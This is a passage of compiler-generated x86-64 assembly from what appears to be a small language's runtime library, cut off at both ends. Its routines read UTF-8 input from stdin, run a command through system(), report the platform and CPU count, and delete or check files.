mov BYTE PTR -217[rbp], al movzx eax, BYTE PTR -217[rbp] .L45: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size shar__get__env__variable, .-shar__get__env__variable .globl shar__get__string__from__cmd__line .type shar__get__string__from__cmd__line, @function shar__get__string__from__cmd__line: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 400 mov QWORD PTR -376[rbp], rdi mov QWORD PTR -384[rbp], rsi mov QWORD PTR -392[rbp], rdx mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov QWORD PTR -352[rbp], 0 cmp QWORD PTR -376[rbp], 0 sete al movzx eax, al test rax, rax je .L68 mov QWORD PTR -360[rbp], 0 jmp .L69 .L68: mov rax, QWORD PTR -376[rbp] mov QWORD PTR -312[rbp], rax mov rax, QWORD PTR -312[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -304[rbp], rax cmp QWORD PTR -304[rbp], 0 sete al movzx eax, al test rax, rax je .L70 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L70: mov rax, QWORD PTR -304[rbp] mov QWORD PTR -360[rbp], rax .L69: mov QWORD PTR -344[rbp], 0 mov BYTE PTR -365[rbp], 1 .L95: lea rdx, -272[rbp] mov rax, QWORD PTR -344[rbp] add rax, rdx mov QWORD PTR -320[rbp], rax mov rdx, QWORD PTR stdin[rip] mov rax, QWORD PTR -344[rbp] mov ecx, eax mov eax, 256 sub eax, ecx mov ecx, eax mov rax, QWORD PTR -320[rbp] mov esi, ecx mov rdi, rax call fgets@PLT cmp QWORD PTR -320[rbp], rax jne .L72 mov QWORD PTR -336[rbp], 0 mov QWORD PTR -344[rbp], 0 .L89: lea rdx, -272[rbp] mov rax, QWORD PTR -336[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -363[rbp], al cmp BYTE PTR -363[rbp], 10 je .L73 cmp BYTE PTR -363[rbp], 0 jne .L74 .L73: mov rax, QWORD PTR -392[rbp] mov rdx, QWORD PTR -360[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -384[rbp] mov rdx, QWORD PTR -352[rbp] mov QWORD PTR [rax], rdx mov eax, 1 jmp .L97 .L74: mov BYTE PTR -364[rbp], 0 movzx eax, BYTE PTR -363[rbp] mov WORD PTR -362[rbp], ax movzx eax, BYTE PTR -363[rbp] test al, al js .L76 mov BYTE PTR -364[rbp], 1 jmp .L77 .L76: movzx eax, BYTE PTR -363[rbp] and eax, 224 cmp eax, 192 jne .L78 mov BYTE PTR -364[rbp], 2 cmp QWORD PTR -336[rbp], 255 jne .L79 mov QWORD PTR -344[rbp], 1 jmp .L80 .L79: mov rax, QWORD PTR -336[rbp] add rax, 1 movzx eax, BYTE PTR -272[rbp+rax] mov BYTE PTR -363[rbp], al movzx eax, BYTE PTR -363[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L81 mov BYTE PTR -365[rbp], 0 jmp .L80 .L81: xor WORD PTR -362[rbp], 192 sal WORD PTR -362[rbp], 6 movzx eax, BYTE PTR -363[rbp] xor eax, -128 movzx eax, al or WORD PTR -362[rbp], ax jmp .L77 .L78: movzx eax, BYTE PTR -363[rbp] and eax, 240 cmp eax, 224 jne .L82 mov BYTE PTR -364[rbp], 3 cmp QWORD PTR -336[rbp], 253 jbe .L83 mov eax, 256 sub rax, QWORD PTR -336[rbp] mov QWORD PTR -344[rbp], rax jmp .L80 .L83: mov rax, QWORD PTR -336[rbp] add rax, 1 movzx eax, BYTE PTR -272[rbp+rax] mov BYTE PTR -363[rbp], al movzx eax, BYTE PTR -363[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L84 mov BYTE PTR -365[rbp], 0 jmp .L80 .L84: xor WORD PTR -362[rbp], 224 sal WORD PTR -362[rbp], 6 movzx eax, BYTE PTR -363[rbp] xor eax, -128 movzx eax, al or WORD PTR -362[rbp], ax mov rax, QWORD PTR -336[rbp] add rax, 2 movzx eax, BYTE PTR -272[rbp+rax] mov BYTE PTR -363[rbp], al movzx eax, BYTE PTR -363[rbp] and eax, 192 cmp eax, 128 setne al movzx eax, al test rax, rax je .L85 mov BYTE PTR -365[rbp], 0 jmp .L80 .L85: sal WORD PTR -362[rbp], 6 movzx eax, BYTE PTR -363[rbp] xor eax, -128 movzx eax, al or WORD PTR -362[rbp], ax jmp .L77 .L82: mov BYTE PTR -365[rbp], 0 jmp .L80 .L77: movzx eax, BYTE PTR -364[rbp] add QWORD PTR -336[rbp], rax add QWORD PTR -352[rbp], 1 mov rax, QWORD PTR -352[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -376[rbp] add rdx, rax mov rax, QWORD PTR -360[rbp] mov QWORD PTR -296[rbp], rax mov QWORD PTR -288[rbp], rdx mov rdx, QWORD PTR -288[rbp] mov rax, QWORD PTR -296[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -280[rbp], rax cmp QWORD PTR -280[rbp], 0 sete al movzx eax, al test rax, rax je .L86 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L86: mov rax, QWORD PTR -280[rbp] mov QWORD PTR -360[rbp], rax mov rax, QWORD PTR -352[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -376[rbp] add rax, rdx lea rdx, -2[rax] mov rax, QWORD PTR -360[rbp] add rdx, rax movzx eax, WORD PTR -362[rbp] mov WORD PTR [rdx], ax cmp QWORD PTR -336[rbp], 256 je .L100 jmp .L89 .L100: nop .L80: movzx eax, BYTE PTR -365[rbp] xor eax, 1 movzx eax, al test rax, rax jne .L101 mov QWORD PTR -328[rbp], 0 jmp .L92 .L93: mov rax, QWORD PTR -328[rbp] sub rax, QWORD PTR -344[rbp] add rax, 256 movzx eax, BYTE PTR -272[rbp+rax] lea rcx, -272[rbp] mov rdx, QWORD PTR -328[rbp] add rdx, rcx mov BYTE PTR [rdx], al add QWORD PTR -328[rbp], 1 .L92: mov rax, QWORD PTR -328[rbp] cmp rax, QWORD PTR -344[rbp] jb .L93 jmp .L95 .L72: cmp QWORD PTR -352[rbp], 0 je .L91 cmp QWORD PTR -344[rbp], 0 jne .L91 mov rax, QWORD PTR -392[rbp] mov rdx, QWORD PTR -360[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -384[rbp] mov rdx, QWORD PTR -352[rbp] mov QWORD PTR [rax], rdx mov eax, 1 jmp .L97 .L101: nop .L91: cmp QWORD PTR -360[rbp], 0 je .L96 mov rax, QWORD PTR -360[rbp] mov rdi, rax call free@PLT .L96: mov rax, QWORD PTR -392[rbp] mov QWORD PTR [rax], 0 mov rax, QWORD PTR -384[rbp] mov QWORD PTR [rax], 0 mov eax, 0 .L97: mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L98 call __stack_chk_fail@PLT .L98: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size shar__get__string__from__cmd__line, .-shar__get__string__from__cmd__line .globl shar__get__platform__name .type shar__get__platform__name, @function shar__get__platform__name: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov QWORD PTR -56[rbp], rdx mov rax, QWORD PTR -40[rbp] add rax, 24 mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -16[rbp] mov rdi, rax call malloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L103 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L103: mov rdx, QWORD PTR -8[rbp] mov rax, QWORD PTR -56[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -48[rbp] mov QWORD PTR [rax], 12 mov rax, QWORD PTR -56[rbp] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -40[rbp] add rax, rdx mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -24[rbp] mov WORD PTR [rax], 76 mov rax, QWORD PTR -24[rbp] add rax, 2 mov WORD PTR [rax], 105 mov rax, QWORD PTR -24[rbp] add rax, 4 mov WORD PTR [rax], 110 mov rax, QWORD PTR -24[rbp] add rax, 6 mov WORD PTR [rax], 117 mov rax, QWORD PTR -24[rbp] add rax, 8 mov WORD PTR [rax], 120 mov rax, QWORD PTR -24[rbp] add rax, 10 mov WORD PTR [rax], 32 mov rax, QWORD PTR -24[rbp] add rax, 12 mov WORD PTR [rax], 120 mov rax, QWORD PTR -24[rbp] add rax, 14 mov WORD PTR [rax], 56 mov rax, QWORD PTR -24[rbp] add rax, 16 mov WORD PTR [rax], 54 mov rax, QWORD PTR -24[rbp] add rax, 18 mov WORD PTR [rax], 95 mov rax, QWORD PTR -24[rbp] add rax, 20 mov WORD PTR [rax], 54 mov rax, QWORD PTR -24[rbp] add rax, 22 mov WORD PTR [rax], 52 nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size shar__get__platform__name, .-shar__get__platform__name .globl shar__execute__command .type shar__execute__command, @function shar__execute__command: .LFB15: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 add rsp, -128 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi cmp QWORD PTR -120[rbp], 0 jne .L106 mov eax, 0 jmp .L107 .L106: mov rax, QWORD PTR -120[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -128[rbp] mov QWORD PTR -88[rbp], rax mov QWORD PTR -80[rbp], 0 mov QWORD PTR -72[rbp], 0 mov QWORD PTR -64[rbp], 0 mov QWORD PTR -56[rbp], 0 jmp .L108 .L120: mov rax, QWORD PTR -56[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -88[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -106[rbp], ax mov BYTE PTR -107[rbp], 0 cmp WORD PTR -106[rbp], 0 je .L124 cmp WORD PTR -106[rbp], 127 ja .L111 mov BYTE PTR -107[rbp], 1 jmp .L112 .L111: cmp WORD PTR -106[rbp], 2047 ja .L113 mov BYTE PTR -107[rbp], 2 jmp .L112 .L113: mov BYTE PTR -107[rbp], 3 .L112: movzx eax, BYTE PTR -107[rbp] add QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -40[rbp], rax mov rdx, QWORD PTR -40[rbp] mov rax, QWORD PTR -48[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -32[rbp], rax cmp QWORD PTR -32[rbp], 0 sete al movzx eax, al test rax, rax je .L114 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L114: mov rax, QWORD PTR -32[rbp] mov QWORD PTR -80[rbp], rax movzx eax, BYTE PTR -107[rbp] cmp eax, 3 je .L116 cmp eax, 3 jg .L117 cmp eax, 1 je .L118 cmp eax, 2 je .L119 jmp .L117 .L118: mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx movzx edx, WORD PTR -106[rbp] mov BYTE PTR [rax], dl jmp .L117 .L119: movzx eax, WORD PTR -106[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L117 .L116: movzx eax, WORD PTR -106[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -106[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -72[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -80[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L117: movzx eax, BYTE PTR -107[rbp] add QWORD PTR -72[rbp], rax jmp .L110 .L124: nop .L110: add QWORD PTR -56[rbp], 1 .L108: mov rax, QWORD PTR -96[rbp] cmp rax, QWORD PTR -56[rbp] ja .L120 mov rax, QWORD PTR -64[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -80[rbp] mov QWORD PTR -24[rbp], rax mov QWORD PTR -16[rbp], rdx mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 sete al movzx eax, al test rax, rax je .L121 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L121: mov rax, QWORD PTR -8[rbp] mov QWORD PTR -80[rbp], rax mov rdx, QWORD PTR -80[rbp] mov rax, QWORD PTR -72[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -80[rbp] mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -104[rbp] mov rdi, rax call system@PLT test eax, eax sete al mov BYTE PTR -108[rbp], al mov rax, QWORD PTR -104[rbp] mov rdi, rax call free@PLT movzx eax, BYTE PTR -108[rbp] .L107: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE15: .size shar__execute__command, .-shar__execute__command .globl shar__get__cpu__cores__number .type shar__get__cpu__cores__number, @function shar__get__cpu__cores__number: .LFB16: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR cpuCoresNumber[rip] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE16: .size shar__get__cpu__cores__number, .-shar__get__cpu__cores__number .globl shar__delete__file .type shar__delete__file, @function shar__delete__file: .LFB17: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 288 mov QWORD PTR -280[rbp], rdi mov QWORD PTR -288[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -280[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -288[rbp] mov QWORD PTR -248[rbp], rax mov QWORD PTR -240[rbp], 0 mov QWORD PTR -232[rbp], 0 mov QWORD PTR -224[rbp], 0 mov QWORD PTR -216[rbp], 0 jmp .L128 .L140: mov rax, QWORD PTR -216[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -248[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -266[rbp], ax mov BYTE PTR -267[rbp], 0 cmp WORD PTR -266[rbp], 0 je .L149 cmp WORD PTR -266[rbp], 127 ja .L131 mov BYTE PTR -267[rbp], 1 jmp .L132 .L131: cmp WORD PTR -266[rbp], 2047 ja .L133 mov BYTE PTR -267[rbp], 2 jmp .L132 .L133: mov BYTE PTR -267[rbp], 3 .L132: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -224[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -192[rbp], rax cmp QWORD PTR -192[rbp], 0 sete al movzx eax, al test rax, rax je .L134 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L134: mov rax, QWORD PTR -192[rbp] mov QWORD PTR -240[rbp], rax movzx eax, BYTE PTR -267[rbp] cmp eax, 3 je .L136 cmp eax, 3 jg .L137 cmp eax, 1 je .L138 cmp eax, 2 je .L139 jmp .L137 .L138: mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx movzx edx, WORD PTR -266[rbp] mov BYTE PTR [rax], dl jmp .L137 .L139: movzx eax, WORD PTR -266[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L137 .L136: movzx eax, WORD PTR -266[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L137: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -232[rbp], rax jmp .L130 .L149: nop .L130: add QWORD PTR -216[rbp], 1 .L128: mov rax, QWORD PTR -256[rbp] cmp rax, QWORD PTR -216[rbp] ja .L140 mov rax, QWORD PTR -224[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], rdx mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -184[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -168[rbp], rax cmp QWORD PTR -168[rbp], 0 sete al movzx eax, al test rax, rax je .L141 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L141: mov rax, QWORD PTR -168[rbp] mov QWORD PTR -240[rbp], rax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -240[rbp] mov QWORD PTR -264[rbp], rax lea rdx, -160[rbp] mov rax, QWORD PTR -264[rbp] mov rsi, rdx mov rdi, rax call stat@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al cmp BYTE PTR -268[rbp], 0 je .L144 mov eax, DWORD PTR -136[rbp] and eax, 16384 test eax, eax jne .L144 mov eax, 1 jmp .L145 .L144: mov eax, 0 .L145: mov BYTE PTR -268[rbp], al and BYTE PTR -268[rbp], 1 cmp BYTE PTR -268[rbp], 0 je .L146 mov rax, QWORD PTR -264[rbp] mov rdi, rax call remove@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al .L146: mov rax, QWORD PTR -264[rbp] mov rdi, rax call free@PLT movzx eax, BYTE PTR -268[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L148 call __stack_chk_fail@PLT .L148: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE17: .size shar__delete__file, .-shar__delete__file .globl shar__delete__empty__directory .type shar__delete__empty__directory, @function shar__delete__empty__directory: .LFB18: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 288 mov QWORD PTR -280[rbp], rdi mov QWORD PTR -288[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -280[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -288[rbp] mov QWORD PTR -248[rbp], rax mov QWORD PTR -240[rbp], 0 mov QWORD PTR -232[rbp], 0 mov QWORD PTR -224[rbp], 0 mov QWORD PTR -216[rbp], 0 jmp .L151 .L163: mov rax, QWORD PTR -216[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -248[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -266[rbp], ax mov BYTE PTR -267[rbp], 0 cmp WORD PTR -266[rbp], 0 je .L172 cmp WORD PTR -266[rbp], 127 ja .L154 mov BYTE PTR -267[rbp], 1 jmp .L155 .L154: cmp WORD PTR -266[rbp], 2047 ja .L156 mov BYTE PTR -267[rbp], 2 jmp .L155 .L156: mov BYTE PTR -267[rbp], 3 .L155: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -224[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -192[rbp], rax cmp QWORD PTR -192[rbp], 0 sete al movzx eax, al test rax, rax je .L157 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L157: mov rax, QWORD PTR -192[rbp] mov QWORD PTR -240[rbp], rax movzx eax, BYTE PTR -267[rbp] cmp eax, 3 je .L159 cmp eax, 3 jg .L160 cmp eax, 1 je .L161 cmp eax, 2 je .L162 jmp .L160 .L161: mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx movzx edx, WORD PTR -266[rbp] mov BYTE PTR [rax], dl jmp .L160 .L162: movzx eax, WORD PTR -266[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L160 .L159: movzx eax, WORD PTR -266[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L160: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -232[rbp], rax jmp .L153 .L172: nop .L153: add QWORD PTR -216[rbp], 1 .L151: mov rax, QWORD PTR -256[rbp] cmp rax, QWORD PTR -216[rbp] ja .L163 mov rax, QWORD PTR -224[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], rdx mov rdx, QWORD PTR -176[rbp] mov rax, QWORD PTR -184[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -168[rbp], rax cmp QWORD PTR -168[rbp], 0 sete al movzx eax, al test rax, rax je .L164 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L164: mov rax, QWORD PTR -168[rbp] mov QWORD PTR -240[rbp], rax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -240[rbp] mov QWORD PTR -264[rbp], rax lea rdx, -160[rbp] mov rax, QWORD PTR -264[rbp] mov rsi, rdx mov rdi, rax call stat@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al cmp BYTE PTR -268[rbp], 0 je .L167 mov eax, DWORD PTR -136[rbp] and eax, 16384 test eax, eax je .L167 mov eax, 1 jmp .L168 .L167: mov eax, 0 .L168: mov BYTE PTR -268[rbp], al and BYTE PTR -268[rbp], 1 cmp BYTE PTR -268[rbp], 0 je .L169 mov rax, QWORD PTR -264[rbp] mov rdi, rax call remove@PLT test eax, eax sete al mov BYTE PTR -268[rbp], al .L169: mov rax, QWORD PTR -264[rbp] mov rdi, rax call free@PLT movzx eax, BYTE PTR -268[rbp] mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L171 call __stack_chk_fail@PLT .L171: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE18: .size shar__delete__empty__directory, .-shar__delete__empty__directory .globl shar__file__is__exist .type shar__file__is__exist, @function shar__file__is__exist: .LFB19: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 288 mov QWORD PTR -280[rbp], rdi mov QWORD PTR -288[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -280[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -288[rbp] mov QWORD PTR -248[rbp], rax mov QWORD PTR -240[rbp], 0 mov QWORD PTR -232[rbp], 0 mov QWORD PTR -224[rbp], 0 mov QWORD PTR -216[rbp], 0 jmp .L174 .L186: mov rax, QWORD PTR -216[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -248[rbp] add rax, rdx movzx eax, WORD PTR [rax] mov WORD PTR -266[rbp], ax mov BYTE PTR -267[rbp], 0 cmp WORD PTR -266[rbp], 0 je .L194 cmp WORD PTR -266[rbp], 127 ja .L177 mov BYTE PTR -267[rbp], 1 jmp .L178 .L177: cmp WORD PTR -266[rbp], 2047 ja .L179 mov BYTE PTR -267[rbp], 2 jmp .L178 .L179: mov BYTE PTR -267[rbp], 3 .L178: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -224[rbp] mov QWORD PTR -200[rbp], rax mov rdx, QWORD PTR -200[rbp] mov rax, QWORD PTR -208[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -192[rbp], rax cmp QWORD PTR -192[rbp], 0 sete al movzx eax, al test rax, rax je .L180 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 19 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT mov edi, 1 call exit@PLT .L180: mov rax, QWORD PTR -192[rbp] mov QWORD PTR -240[rbp], rax movzx eax, BYTE PTR -267[rbp] cmp eax, 3 je .L182 cmp eax, 3 jg .L183 cmp eax, 1 je .L184 cmp eax, 2 je .L185 jmp .L183 .L184: mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx movzx edx, WORD PTR -266[rbp] mov BYTE PTR [rax], dl jmp .L183 .L185: movzx eax, WORD PTR -266[rbp] shr ax, 6 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -64 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl jmp .L183 .L182: movzx eax, WORD PTR -266[rbp] shr ax, 12 mov ecx, eax mov rdx, QWORD PTR -240[rbp] mov rax, QWORD PTR -232[rbp] add rax, rdx or ecx, -32 mov edx, ecx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] shr ax, 6 and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 1[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl movzx eax, WORD PTR -266[rbp] and eax, 63 or eax, -128 mov edx, eax mov rax, QWORD PTR -232[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -240[rbp] add rax, rcx mov BYTE PTR [rax], dl nop .L183: movzx eax, BYTE PTR -267[rbp] add QWORD PTR -232[rbp], rax jmp .L176 .L194: nop .L176: add QWORD PTR -216[rbp], 1 .L174: mov rax, QWORD PTR -256[rbp] cmp rax, QWORD PTR -216[rbp] ja .L186 mov rax, QWORD PTR -224[rbp] lea rdx, 1[rax] mov rax, QWORD PTR -240[rbp] mov QWORD PTR -184[rbp], rax mov QWORD PTR -176[rbp], rdx mov rdx, QWORD PTR -176[rbp] mov rax, 